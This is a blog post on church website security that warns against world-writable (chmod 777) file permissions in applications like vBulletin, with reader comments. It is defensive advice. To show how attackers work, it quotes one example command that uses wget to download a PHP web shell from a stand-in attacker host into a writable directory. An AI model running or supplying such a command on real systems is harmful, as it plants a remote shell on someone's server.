Heal Your Church WebSite


Teaching, rebuking, correcting & training in righteous web design.

find -perm 777 your first ssh security stop

Want to get hacked? It’s easy, just ‘chmod 777′ everything the next time you install a bbs or photo gallery application. Don’t want to get hacked? Read on and ‘find’ how hackers see, and exploit the unsecured areas of your system.

For those of you running online community applications such as phpBB, vBulletin, Coppermine Gallery, Mambo and a few others, installation can be a breeze if you have shell access. That said, installations can also lead to an unwanted visit if you get sloppy with your file permissions during the install.

For today’s example, I’ll pick on vBulletin today because it is a commercial product, but be warned: today’s topic of discussion equally applies to a host of ‘open sores’ applications as well.

The neer-do-well runs a Google search for those websites that are ‘Powered by: vBulletin Version 3.0.x.’ Upon finding a potential victom, they visit the site and … pay attention now … through their browser request a URL on your system that contains a remote command. That first remote command is likely to include “find -perm 777″ giving the hakr all the information he needs to then “wget http://myhakrhost.ru/myshell.php -O /your/unsecure/directory/logon.php” onto your system. Once that happens, there is nothing left but to wipe your system clean and pray your backups are recent and reliable (more on that topic another time).

So two things I ask of you.

  1. Keep your online applications up-to-date – get on their mailing list to kee abreast of changes, updates and patches.
  2. For those of you with shell access to your system, run file permission scans such as ‘find -perm 777′ on your system before someone less trustworthy does. You might be disturbed by what you ‘find.’

For those of you whose paranoia-meter just went off scale, here is a command that for now will lock down those open areas:

find . -perm 777 -exec chmod 755 {} \;

For those of you with root access:

find / -perm 777 -type d

You may also want to run a scan for programs that provide web-based shell access. You’ll be glad you did.

6 Comments

  1. I *always* seriously re-evaluate the use of any web application that has me 777 any file — directories are another matter, as we all know, but when they tell me to apply it to a file instead of 666 or 755, I usually go looking for another solution for my needs.

  2. Forgive my lack of understanding here, but I’m not sure what you mean by ‘request a URL on your system that contains a remote command.’ Does this mean that a specific file contains a security flaw allowing a remote command to be executed? Or, are you saying that by having any file marked 777 the system can be compromised?

  3. This is pretty common with WordPress, since it lets you edit the templates online, but only if they’re writable. What would you suggest? The files that need to be editable are .php and .css files.

  4. IMHO… The danger of using 777 permissions really only matters if other users have access to your directories. In any case, most hosts (or any decent host) use vhosts, making access to files/directories, through ssh, telnet or ftp, impossible.

  5. Individual files need only a CHMOD of 666 to be write-able. 777 gives global writing AND execution to them.

  6. Pfft I had just read this and was thinking Hmm I should do this about 2 days ago. I of course had not done it yet as I still haven’t set up the shell access on the churches website.(need to fax in my ID)

    ANYWAYS…

    Last night just a few hours after I checked up on the website… we got hacked. Just a simple defacement. They managed to change the index.php some how and I’m not even sure how they managed it. Since I only had permission set to Owner read/write and group read/write(the only group is me)…

    Sort of an odd feeling to have it done to me. I’m no expert but I had falsly thought I had the site locked down fairly well. :( Guess it’s a good thing I’m planning out version 2 of the site right now.

    If any of you would like to take a look at the site and help me out. Because I am throughly confused as to how they worked it.

    btw the bragging site for the hacker
    http://www.zone-h.org/en/defacements/view/id=2716715/